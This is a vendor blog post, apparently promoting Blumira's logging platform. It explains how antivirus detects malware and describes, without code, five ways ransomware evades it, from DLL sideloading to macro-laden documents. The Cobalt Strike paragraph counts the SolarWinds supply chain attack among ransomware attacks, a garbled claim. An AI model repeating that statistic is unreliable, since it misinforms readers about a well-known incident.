Antivirus software is a crucial component of any security stack. The original role of antivirus (AV) was to solely detect viruses, but antivirus coverage has expanded as security threats evolve. Modern AV software can now protect against other malware, such as keyloggers, trojan horses, rootkits, and more.
Most antivirus vendors claim that their software prevents ransomware. That’s true to a certain extent; most antivirus software can typically detect known strains of ransomware. Many antivirus products have spam filters that can prevent end users from receiving malicious emails from threat actors.
But to rely solely on antivirus as a silver bullet to prevent ransomware would be a grave mistake, just as it would be a mistake to rely on any single product. As Eva Chen, CEO of Trend Micro, said to ZDNet, “In the antivirus business, we have been lying to customers for 20 years…No one is able to detect five and a half million viruses.”
That was back in 2008 — and since then, the security threat landscape has evolved significantly.
As ransomware has become more profitable, threat actors can dedicate more resources to developing sophisticated ways to infiltrate an environment. Oftentimes these techniques are specifically designed to evade security measures such as antivirus.
To understand why antivirus software isn’t enough to prevent ransomware, let’s take a look at how antivirus works.
Antivirus software constantly scans programs and files and analyzes that data against a database of known types of malware. Generally, antivirus uses three different methods to detect viruses:
Scanning or specific detection. An antivirus scanner compares data against a list of unique signatures or characteristics that viruses typically have. This is the most common detection method; nearly every antivirus product uses it to detect malware.
However, malware developers can easily evade this technique by changing the code, encrypting it, or modifying the signature string. Also, this method only scans for something it has the signature of — which doesn’t include new strains of malware. Open source software or malware-creation kits allow people without any coding experience to easily create and customize malware.
Generic detection. To address the limitations of specific detection, generic detection looks for common features of popular malware families. Generic detections can be broad — like scanning for known exploit code — or specific; for example, scanning for specific packers that one malware strain uses.
Heuristic detection. This is a more advanced method of detection that uses suspicious behavior or file structures to detect viruses. Antivirus software developers develop a set of rules to distinguish viruses from normal behavior, and then test code segments against these rules to determine whether they are a virus.
Even advanced detection methods like heuristics aren’t 100% effective, according to Chen. Virus writers know that heuristics use rules to inspect files, so they split the malicious program into different files, then download each file to test it against the rule.
Of course cybercriminals are aware of antivirus products and understand how they work. To evade antivirus, threat actors use a variety of evasion techniques to gain access to a system and to eventually execute a ransom payload. More sophisticated attacks often include a combination of multiple techniques.
1.DLL Injection
DLL injection or DLL hijacking is a technique in which a threat actor executes malicious dynamic link libraries (DLLs) that look like real ones, used by groups like REvil to launch ransomware attacks. DLL files are necessary components of a Windows OS, but they can be manipulated.
For example, the banking trojan strain Dridex used newly created DLLs in phishing emails to evade file signature detection from antivirus software. These DLLs were sideloaded via legitimate Windows binaries, making them look like legitimate software products.
2. Phishing
Phishing is the second most common attack vector (besides RDP compromise) that ransomware actors use to launch an attack, according to Coveware.
Antivirus software can’t stop phishing attacks, especially those that use social engineering techniques to trick users into handing over sensitive information. Some antivirus products scan email, but they generally cannot detect malicious code injected in an email. That’s why end user awareness is an important component of every security strategy.
3. Fileless Malware
Many ransomware and malware attacks involve installing malicious files on a computer, but a fileless attack takes advantage of tools and applications that are already built into a system by piggybacking on legitimate scripts to run malicious activity. Fileless malware attacks are memory-based rather than file-based, making them extremely difficult to detect.
Fileless malware attacks include injecting malicious code into legitimate Microsoft Word code, JavaScript code, or PowerShell scripts. For example, Netwalker ransomware attacks involved malware that was written in PowerShell and executed directly in memory, rather than storing the ransomware binary into the disk.
Since antivirus software tracks the traditional characteristics of a malware signature, it cannot detect fileless malware, because it doesn’t have signatures to detect.
4. Obfuscated Malware
Obfuscation techniques are meant to evade detection, and like fileless malware, they often rely on legitimate tools that are already in a system. Cobalt Strike is a classic example of this; it’s a legitimate tool that security researchers use for pentesting. Threat actors use Cobalt Strike as a backdoor or for lateral movement; in Q2 of 2020, 66% of all ransomware attacks — including the Solar Winds supply chain attack — involved Cobalt Strike payloads.
Although some Cobalt Strike payload signatures can be detected with antivirus, many Cobalt Strike attacks obfuscate the shellcode to evade detection. AV products use sandboxing — a separate environment to inspect executables — to detect malware, but hiding the shellcode over a named pipe means that the sandbox won’t find it.
To detect Cobalt Strike, use sysmon in conjunction with a security incident and event management (SIEM) platform and look out for DNS and Proxy logs. Blumira detects when Cobalt Strike is being used in an environment.
5. Weaponized Documents
Cybercriminals typically use weaponized documents in tandem with a phishing campaign. For example, a user may receive an email that instructs them to click on an attachment that looks like a resume, invoice, or Excel spreadsheet. That document, however, is embedded with malicious code that threat actors can use to infiltrate a system.
The crypto-ransomware strain Locky used a malicious macro in a Word document to install an executable file on a victim’s device that encrypts the user’s documents, database, images, and other data. Another malware strain called IcedID uses rigged Excel spreadsheets as a delivery mechanism, tricking users to open them by claiming that they were sued or owe money.
Antivirus is a worthwhile investment in any security stack, but there’s no single product that will fully prevent ransomware. The best way for organizations to protect themselves is with a layered, nuanced approach to security. Investing in a next-generation firewall (NGFW), a robust antivirus product, and endpoint detection and response are important steps. But those tools are ineffective without a way to receive alerts and have visibility into an environment, which is why it’s crucial to have a centralized logging solution like Blumira.
The best way to prevent ransomware is to be familiar with the stages of a ransomware attack, and then to detect those behaviors. Blumira detects these tactics, such as reconnaissance, password spraying, privilege escalation, and more and alerts you early enough to stop an attack.
Blumira not only detects behaviors associated with ransomware, but our platform provides automated workflows and playbooks to give you guidance on remediation steps. Our team of security experts act as an extension of your team, ready to answer any questions about a finding or how to move forward.
Get your Blumira Free account today; deployment takes a matter of hours, and it’s easy to start getting immediate security value in your organization.